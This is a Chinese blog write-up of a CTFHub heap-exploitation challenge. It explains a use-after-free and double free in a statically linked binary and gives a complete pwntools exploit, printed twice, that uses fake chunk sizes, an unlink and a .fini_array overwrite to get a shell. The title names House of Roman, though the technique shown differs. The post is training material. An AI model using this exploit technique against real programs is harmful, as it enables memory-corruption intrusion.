[CTFHub-技能树]-----House of roman

最新推荐文章于 2024-07-17 23:48:55 发布
最新推荐文章于 2024-07-17 23:48:55 发布
阅读量160 收藏
点赞数
分类专栏: PWN 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KaliLinux_V/article/details/128951462
版权

检查

这是一道静态编译的题,没有libc库,所以不能用常规的方法来打

在这里插入图片描述

分析:

直接看漏洞点
在这里插入图片描述
这里free之后没有对指针置空,所以存在double free和UAF漏洞。

思路

.fini_array会在程序结束时调用,一般有2个指针,会依次调用,调用完后才会真正退出。
先利用UAF漏洞,把chunk申请到ptr_size处,修改size的大小,构造堆溢出,利用堆溢出,打unlink,把chunk申请到ptr处,最后篡改**.fini_array**的值,拿到shell

利用

先把前面的代码写好

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
#io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",29732)
io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))


def add(size):
	ru(b"your choice: ")
	sl(b"1")
	ru(b"size: ")
	sl(str(size))

def free(idx):
	ru(b"your choice: ")
	sl(b"2")
	ru(b"index: ")
	sl(str(idx))


def edit(idx,data):
	ru(b"your choice: ")
	sl(b"3")
	ru(b"index: ")
	sl(str(idx))
	ru(b"content: ")
	s(data)

先定义好要用到的地址

fini_array = 0x6CAE88
fake_chunk = 0x6cde70
fake_fd = fake_chunk-0x18
fake_bk = fake_chunk-0x10
ptr_size = 0x6CDEC0

先用UAF把chunk申请到size处。如下图,可以看出来chunk已经申请到size处了,之后伪造size,造成堆溢出

add(0x7f)
add(0x60)
add(0x7f)
free(1)
edit(1,p64(ptr_size))
add(0x60)  #3
add(0x60)	#4

在这里插入图片描述

之后篡改size大小

add(0x80)	#5
add(0x80)	#6
add(0x80)	#7
add(0x10)	#8
edit(4,b"\xff\x00\x00\x00"*4)

结果如下图,size都改成了0xff

之后再利用堆溢出,打unlink,篡改.fini_array

payload = p64(0)+p64(0x81)+p64(fake_fd)+p64(fake_bk)+b"a"*(0x80-4*8)
payload += p64(0x80)+p64(0x90)
edit(6,payload)
free(7)
edit(6,p64(0)*3+p64(fini_array))
edit(6,p64(0x4009AE)*2)
ru(b"your choice: ")
sl(b"4")

最终exp为

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
#io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",29732)
io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))


def add(size):
	ru(b"your choice: ")
	sl(b"1")
	ru(b"size: ")
	sl(str(size))

def free(idx):
	ru(b"your choice: ")
	sl(b"2")
	ru(b"index: ")
	sl(str(idx))


def edit(idx,data):
	ru(b"your choice: ")
	sl(b"3")
	ru(b"index: ")
	sl(str(idx))
	ru(b"content: ")
	s(data)

fini_array = 0x6CAE88
fake_chunk = 0x6cde70
fake_fd = fake_chunk-0x18
fake_bk = fake_chunk-0x10
ptr_size = 0x6CDEC0

add(0x7f)
add(0x60)
add(0x7f)
free(1)
edit(1,p64(ptr_size))
add(0x60)  #3
add(0x60)	#4
add(0x80)	#5
add(0x80)	#6
add(0x80)	#7
add(0x10)	#8
edit(4,b"\xff\x00\x00\x00"*4)

payload = p64(0)+p64(0x81)+p64(fake_fd)+p64(fake_bk)+b"a"*(0x80-4*8)
payload += p64(0x80)+p64(0x90)
edit(6,payload)
free(7)
edit(6,p64(0)*3+p64(fini_array))
edit(6,p64(0x4009AE)*2)
ru(b"your choice: ")
sl(b"4")



itr()
saulgoodman-q
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
house-hunting-app
05-07
房屋狩猎应用 :house: 房屋搜索应用程序,可方便地访问和出租可用房屋 现场演示 :television: 使用以下凭证: 电子邮件: 密码:123456789 主要问题 :new_moon_face: 大多数打算结婚或正在寻找房屋的人会发现很难...
House-Price-Model-Deployment
05-04
Flask&Heroku房屋价格模型部署 项目链接(与Heroku一起部署): 目标 在此项目中,我们的目标是根据在Deploy环境中提供的字段中输入的信息来估算房屋的价格。 要求 您需要按原样复制或存储库。...
[CTFHub]-技能树----pwn tcache Attack
KaliLinux_V的博客
02-02 195
目前只有我一人解出来,估计是其他大佬不屑于做这样简单的题吧!长话短说,做类题一定要亲自动手,重要的事情说三遍。
scikit-learn初级
weixin_50559423的博客
12-09 7146
s第一章 scikit-learn初级 官网:https://scikit-learn.org/stable/index.html 1.1 Scikit-Learn简介 Scikit-Learn(简称Sklearn)是Python的第三方模块,它是机器学习领域中知名的Python模块之一,它对常用的机器学习算法进行了封装,包括回归(Regression)、降维(Dimensionality Reduction)、分类(Classification)和聚类(Clustering)四大机器学习算法。Scikit
使用 k-means 聚类算法对多维属性数据进行分类
weixin_44708254的博客
03-17 9345
k-means高维聚类: https://www.cnblogs.com/icydengyw/p/13591990.html
Ansible-tower使用方法(一):使用本地playbook
icanflying的博客
02-18 3593
通过上一篇博文我们可以在主机上安装ansible-tower,在互联网有关playbook详细使用的文章太少,所以再次整理一下供参考,后续有时间会陆续补充 一、首先我们要添加主机用于执行任务 1、定义一个Organizations组织,类似部门下拥有某些项目,有很多主机组 2、添加清单,类似主机分组 3、添加完主机组就可以来添加主机 (1)、通过界面以yaml语言的方式进行添加 ansible_ssh_port: 22 ansible_ssh_user: root ..
若依微服务版(ruoyi-cloud)使用记录
FunnyWhiteCat的博客
07-22 1万+
记录一下使用ruoyi-cloud过程中遇到的问题 开发工具 Intellij Idea Community、Visual Studio Code Idea 建议安装插件:Free Mybatis plugin,这样可以从 mapper 接口直接跳转到对应的 mapper.xml 文件 vscode 建议安装插件:Vetur、vscode-element-helper、ESLint 目录 1.启动 2.代码生成 3.协同开发一个模块 4.新建模块 5.将模块抽取为单独的项目 6.服务接口
house-of-spirit-pwn200
csdn546229768的博客
01-11 2560
前言 : 因为期末考试加上复习的原因,接近一个月没有做pwn题了,放寒假就回来在物理机上面装了个ubuntu(折腾了几天,不过装好了做题环境还是挺好用的),打算这个寒假学习完知识.来年好好上课(大三压力大!)有空打打比赛. 例题 : lctf2016_pwn200 house-of-spirit 利用条件: (1)想要控制的目标区域的上方空间与下方空间都是可控的内存区域 (2)存在可将变量指针覆盖指向为上方可控空间,从而达到将非可控空间与可控空间进行合并变成fake_chunk(有点像unlink) (
1997-2007,KDD CUP的二十年
笨笨的粽子妞
08-17 9355
2017年8月13-17日,第23届KDD大会在加拿大哈利法克斯召开。KDD CUP是ACM SIGKDD组织的有关数据挖掘和知识发现领域的年度赛事,作为KDD年会的重要组成部分,从1997年至今,已有二十年的历史,是目前数据挖掘领域最有影响力的赛事。今天,我们就一起来回顾下这二十年的KDD CUP吧。
分布式深度学习技术-AllReduce
星辰大海,脚踏实地
12-15 1万+
Hello, I am Yuichiro Ueno. I participated in a summer internship program at PFN in 2017, and I currently work as a part-time engineer. I am an undergraduate student at Tokyo Institute of Technology, a...
机器学习-2.Python机器学习软件包Scikit-Learn的学习与运用
Pretend的博客
12-08 8560
EduCoder:机器学习—Python机器学习软件包Scikit-Learn的学习与运用 第1关:使用scikit-learn导入数据集 编程要求: 本关任务是,使用 scikit-learn 的datasets模块导入iris数据集,提取前 5 条原数据、前 5 条数据标签及原数据的数组大小。 请按照编程要求,补全右侧编辑器Begin-End区间的代码。 测试说明: 本关的测试文件是step1/testImportData.py,该代码负责对你的实现代码进行测试,注意step1/testImport
The CIFAR-10 dataset 数据集
热门推荐
GarfieldEr007的专栏
05-23 1万+
The CIFAR-10 and CIFAR-100 are labeled subsets of the 80 million tiny images dataset. They were collected by Alex Krizhevsky, Vinod Nair, and Geoffrey Hinton. The CIFAR-10 dataset The CIFAR-10 dat
house-agent.rar
03-26
本项目"house-agent.rar"就是一个典型的应用实例,它巧妙地结合了多个技术组件,构建了一个功能完备的房地产中介系统。下面,我们将深入探讨其中涉及的关键技术点。 首先,SpringBoot是Spring框架的简化版本,它...
ddd-house::house: 用 DDD 盖房子
06-29
滴滴之家该存储库用于“用 DDD 建造房屋”。 这是让我了解我最近学习的一些概念的一种方式。 例如以下内容:命令和处理程序命令总线领域事件BDD(使用 Behat 和 PHPSpec)我最大的目标是实现层的分离。...
PHPWind House v1.0 utf-8.zip
07-07
地方网站的盈利点,从行业来说,大概有房产、家装、婚庆交友、美食、母婴、汽车,还有家政、美容、培训等等。我们在去年9月份的时候,就推出了分类信息的功能,其中包括了几大刚性需求,即:房产、婚庆、母婴、美食...
自建SMTP服务器:如何保障安全稳定的发信?
danplus的博客
07-17 484
自建SMTP服务器虽然可以提供更高的灵活性和控制力,但也需要投入大量的时间和精力来保障其安全和稳定。AokSend,指导您自建SMTP服务器,结合API接口,高效稳定,让邮件营销更加自主可控!
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
LNN0212的博客
07-17 799
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 561
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
内容安全(深度行为检测技术、IPS、AV、入侵检测方法)
最新发布
Thewei666的博客
07-17 1035
区分不同的签名。
second-hand-house-master源码
05-13
Second-hand-house-master是一个二手房源码,是由PHP语言开发的一个简单而实用的房产信息管理系统。这个源码提供有序的房屋信息,包括房屋出售、出租和求购等等,并且提供了房屋查看、房屋搜索、房屋发布等多个功能。这个源码无需再次开发配置,可以在安装完成后直接使用。 该源码基于MVC设计模式,并利用Bootstrap和jQuery等开源前端框架进行交互设计。同时,使用MySQL作为数据库支持,为运行带来保证和稳定性。 系统管理方便,用户只需通过简单的操作即可实现网站的日常维护和更新。系统为用户提供了完整的房屋管理功能,包括房屋列表和房屋添加等,使房屋交易变得更加简单。 总之,Second-hand-house-master是一个强大实用的二手房源码,为中小型地产公司和房地产中介提供了便捷而高效的解决方案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值